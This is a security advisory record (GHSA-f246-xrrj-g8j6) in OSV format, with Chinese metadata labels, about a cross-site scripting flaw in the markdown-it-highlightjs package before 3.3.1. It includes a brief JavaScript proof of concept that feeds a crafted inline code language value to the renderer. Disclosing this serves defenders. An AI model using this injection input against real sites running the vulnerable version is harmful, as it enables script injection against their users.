OSV 1.4.0 · github-reviewed · 修改于 2023-09-06 06:52
发布时间
2022-02-11 04:19
GitHub 审查时间
2021-04-16 05:12
NVD 发布时间
2020-11-16 20:15
源文件
advisories/github-reviewed/2022/02/GHSA-f246-xrrj-g8j6/GHSA-f246-xrrj-g8j6.json
This affects the package markdown-it-highlightjs before 3.3.1. It is possible insert malicious JavaScript as a value of lang in the markdown-it-highlightjs Inline code highlighting feature.
const markdownItHighlightjs = require("markdown-it-highlightjs");
const md = require('markdown-it');
const reuslt_xss = md().use(markdownItHighlightjs, { inline: true }).render('console.log(42){.">js}');
console.log(reuslt_xss);